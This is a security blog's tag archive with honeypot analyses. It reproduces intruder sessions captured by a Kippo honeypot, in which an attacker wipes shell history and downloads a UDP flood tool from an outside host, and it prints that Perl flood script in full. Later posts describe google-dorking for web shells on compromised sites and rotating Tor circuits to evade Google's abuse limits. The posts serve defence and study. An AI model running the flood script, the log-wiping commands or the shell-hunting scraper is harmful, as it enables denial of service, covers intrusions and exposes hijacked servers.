Skip navigation

Tag Archives: web security

Short but sweet.

dev:~# w
 09:27:26 up 29 days, 19:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
dev:~# export HISTFILE=/dev/null
dev:~# export HISTSIZE=0
dev:~# w
 09:27:58 up 29 days, 19:49,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    79.147.238.131    09:27    0.00s  0.00s  0.00s w
dev:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
          inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
          inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
          TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
          collisions:0 txqueuelen:1000
          RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
          TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
dev:~# wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN
-US/W2Ksp3.exe
--2012-10-25 09:30:05--  http://download.microsoft.com/download/win2000platform/
SP/SP3/NT5/EN-US/W2Ksp3.exe
Connecting to download.microsoft.com:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 130978672 (124M) [application/octet-stream]
Saving to: `W2Ksp3.exe

 0% [>                                      ] 1,098        0K/s  eta 1d 21h 7m 1
 0% [>                                      ] 22,818       11K/s  eta 3h 11m 15s
 0% [>                                      ] 182,850      69K/s  eta 31m 27s
 2% [>                                      ] 3,149,716    363K/s  eta 5m 52s^C
200 OK
dev:~# rm -rf .bash_history
dev:~# touch .bash_history
dev:~#

Seems a little odd that our friend 79.147.238.131 (which appears to be a residential (but dynamically assigned…) IP) would go through so much effort just to disconnect the session, but oh well.

Advertisements

I set up a Kippo honeypot a few weeks ago on a micro Amazon instance and left it running, eventually letting it slip my mind. Today, I remembered to check it out, and what do you know, I got some results.

Unfortunately for our intruder, Kippo wasn’t particularly cooperative. Here’s the log:

dev:~# w
15:34:22 up 13 days, 1:55, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 5.13.84.3 15:34 0.00s 0.00s 0.00s w
dev:~# cat /proc/cpuinfo
[--- snip ---]
dev:~# wget http://cachefly.cachefly.net/100mb.test
--2012-10-08 15:35:37-- http://cachefly.cachefly.net/100mb.test
Connecting to cachefly.cachefly.net:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 104857600 (100M) [application/octet-stream]
Saving to: `100mb.test

100%[======================================>] 104,857,600 10113K/s

2012-10-08 15:35:48 (10113 KB/s) - `100mb.test' saved [104857600/104857600]
dev:~# wget http://root-arhive.clan.su/flood/global/udp.tgz
--2012-10-08 15:36:00-- http://root-arhive.clan.su/flood/global/udp.tgz
Connecting to root-arhive.clan.su:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 529 (529bytes) [application/octet-stream]
Saving to: `udp.tgz

100%[======================================>] 529 0K/s

2012-10-08 15:36:01 (0 KB/s) - `udp.tgz' saved [529/529]
dev:~# tar xzvf udp.tgx
tar: udp.tgx: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error exit delayed from previous errors
dev:~# tar xzvf udp.tgz
udp.pl
dev:~# chmod +x *
dev:~# perl udp.pl 12
bash: perl: command not found
dev:~# apt-get install perl
Reading package lists... Done
[--- snip ---]
Setting up perl (1.31-2) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~# apt-get install kernel*
Reading package lists... Done
[--- snip ---]
Setting up kernel (1.4-6) ...
dev:~# apt-get install linux*
Reading package lists... Done
[--- snip ---]
Setting up linux (1.12-8) ...
dev:~# perl udp.pl 12
perl: Segmentation fault
dev:~#

This looks like a fairly typical attack. In short:

  • The hacker has connected from 5.13.84.3. The hacker runs w to see who else is around.
  • The hacker dumps the contents of /proc/cpuinfo to see what kind of machine they’re working with.
  • The hacker downloads http://cachefly.cachefly.net/100mb.test, presumably to check the speed of the connection.
  • The hacker downloads hxxp://root-arhive.clan.su/flood/global/udp.tgz. Looks like they want to use this machine to DoS, but I’ll take a closer look at that file in good time.
  • After this, we can see the hacker’s frustrated attempts to actually RUN their file. Naturally, Kippo is pretty uncooperative, so they soon get fed up and leave.

Now we can take a look at udp.pl. How exciting. The script itself is pretty obvious stuff, so I’ll go ahead and post it. Comments are mine:

#!/usr/bin/perl

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "for any info vizit #GlobaL \n";
 exit(1);
}

# Takes three arguments: Target, port, and how long to flood for.
my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

# Prepares a socket connection. The last parameter is for the protocol, so I'm assuming 17 corresponds to UDP.
socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "Flooding.. $ip port.. $port \n";

# If you haven't declared the port or duration...
if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
# If you HAVE declared the port and duration
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
# If you have declared the port, but not the duration
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
# If you've declared the duration, but not the port
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

# Flood the given port
packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

# Flood a random port
randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

If you’re going to allow ssh access to your server, remember to secure it. Even if you don’t have any data worth stealing, it’s easy for people to turn your machine against others.

Original Post: https://bitsmash.wordpress.com/2012/07/29/finding-compromised-hosts-with-the-google-search-api/

As mentioned before, there were some problems with the simple google dorking approach:

  • Google don’t like automated scraping. Though I doubt this qualifies as automated scraping, I do store the results, which may breach the API’s terms of service. Furthermore, after a few searches, the python script set off suspected abuse triggers, and was temporarily blocked from accessing the API.
  • Without automation, doubling the search = doubling the effort. Expansion of the script is definitely required to find more types of shell.
  • Subsequent similar google searches are likely to return a lot of results that you’ve already seen.
  • There are a lot of false positives. I mentioned before that a number of results are people asking for help with compromised machines. Similarly, there are unwanted results like pastebinned copies of the shell source, etc.

Fortunately, all of these problems have solutions. Or a couple, depending on how you feel about sticking to TOS agreements.

Keeping Google Happy: The good way

Google provide several hints for distinguishing your traffic from automated scraping traffic. For applications written in python, java, etc, they recommend adding the “userip” parameter to HTTP requests, including the IP address of the end user making the request.

Keeping Google Happy: The bad way

The problem is, when making large volumes of requests, especially for a fixed set of search terms, it’s still possible to set off abuse triggers, despite making these efforts to follow their TOS. The solution, if honest attempts to distinguish your traffic from fraudulent traffic fail, is to tunnel your requests through enough different proxies that not too many of these requests come from one location.

With Tor and Java, this is easy. When starting Tor through the Tor Browser Bundle, by default, a Tor SOCKS proxy opens on port 9050, and the Tor command channel listens for instructions on port 9051. You can tunnel traffic from a Java program through a SOCKS proxy using the following commands at the beginning of your code:

System.getProperties().put("proxySet", "true");
System.getProperties().put("socksProxyHost", "localhost");
System.getProperties().put("socksProxyPort", "9050");

The command channel on port 9051 can be communicated with by opening a socket connection and piping in data. To tell Tor to use a new route:

// Pseudocode
socket = new Socket("localhost", 9051)
out = socket.getOutputStream()
out.println('AUTHENTICATE "password"');
out.println('SIGNAL newnym');
socket.close()

After a few seconds, Tor will begin routing traffic through a different path, and you can continue scraping with wild abandon.

Scaling Searches

Pretty self explanatory:

// resultCount variable is used in shell search to control result page offset
for (int i = 1; i &lt;= resultCount; i++) {
    getWSOShells(i);
    getR57Shells(i);
    // ... more shell types
}

Trimming The Fat

To ensure that I don’t have to spend any time wading through duplicated results, I had the scraper pile the information into a database. The table only had four columns: Page Title, URL, Shell Type, Date Found. (PageTitle,URL) was a unique index, so attempting to insert a shell that had already been discovered was denied by the database.

Only thing left to do is throw together a pretty stats page for the discovered shells.

Reducing False Positives

This is the only task I have yet to complete. More in depth inspection of the compromised sites (automated or otherwise) isn’t something I’m interested in. One step too far into the ethical grey area.

The moral of the story is that it’s very easy to make a site with an old, out of date CMS, forget about it, and have it compromised without you ever knowing. And it’s even easier for people with worse intentions than me to find your compromised site with zero effort or technical ability and use it for something bad. Be careful what you leave lying around.

The jsp backdoor I mentioned in the last post inspired me to do a little playing around with php backdoors. PHP backdoors range from incredibly simple to extremely elaborate, and can either be independent .php scripts uploaded to a vulnerable server, or inserted directly into a page. The interfaces for some of these shells are quite distinctive, and I thought, surely some of these shells have to have been indexed by search spiders?

Google provides a search API, but it is fairly limited in the number of searches you can perform per day. It only returns a couple results at a time, meaning you have to perform several requests to get a decent number of results per search. The API is also deprecated, so they reserve the right to turn it off at any time.

The shell I’m focusing on for now is the WSO Shell (Web Shell by Orb). Like many shells, it includes a set of server stats along with the command line. A google search for the string of terms “uname user php hdd cwd WSO” currently returns about 12,700 results. The results from the first page are divided into two groups:

  • People asking for help with their compromised servers
  • Websites with the shell interface bang in the middle (bingo!)

I whipped up a pretty shaky python script to do the heavy lifting:

#!/usr/bin/env python

import sys
import httplib
import json

#########
# STRINGS

WSOShell = '/search?btnG=1&amp;pws=0&amp;q=uname%20user%20php%20hdd%20cwd%20WSO'

def usage():
	print "Usage:"
	print "./shelltale.py [mode]"
	print "Modes: --easy, --hard"
	return

def get_json_results(start):
	conn = httplib.HTTPConnection('ajax.googleapis.com')
	conn.putrequest('GET','/ajax/services/search/web?v=1.0&amp;start='+str(start)+'&amp;q=uname%20user%20php%20hdd%20cwd%20WSO')
	conn.endheaders();
	response = conn.getresponse()
	json_data = json.load(response)
				
	results = json_data['responseData']['results']
	
	for i in range(len(results)):
		print "| " + results[i]['titleNoFormatting']
		print "| - " + results[i]['unescapedUrl']

try:
	if(len(sys.argv) &gt; 1):
		if sys.argv[1] == '--easy':
			print "Scraping small result set from json api."
			print "| Results --------------------------------------"
			for i in range(10):
				get_json_results(i*4)
			print "|-----------------------------------------------"
		elif sys.argv[1] == '--hard':
			print "Scraping bigger result set from search."
				#Room for expansion here
		else:
			usage()
			exit()
	else:
		usage()
		exit()
except IOError, e: 
	if hasattr(e, 'code'): # HTTPError 
		print 'http error code: ', e.code 
	elif hasattr(e, 'reason'): # URLError 
		print "can't connect, reason: ", e.reason 
	else: 
        	raise

… and along comes the stream of nicely formatted results.

Extensions to make:

  • Bypass limits/risks of API by making a scraper for regular google search results
  • Add more search strings for other types of shell
  • Tunnel requests through assorted proxies to avoid IPs getting blocked for too many searches
  • Store results in database for easy storage
  • Disclaimer: I didn’t go on any of these sites. Verification of the shell’s presence was performed by checking the preview screenshot Google supplies with the search results. The most responsible use of the information presented here would be to warn website owners that their machines have been compromised.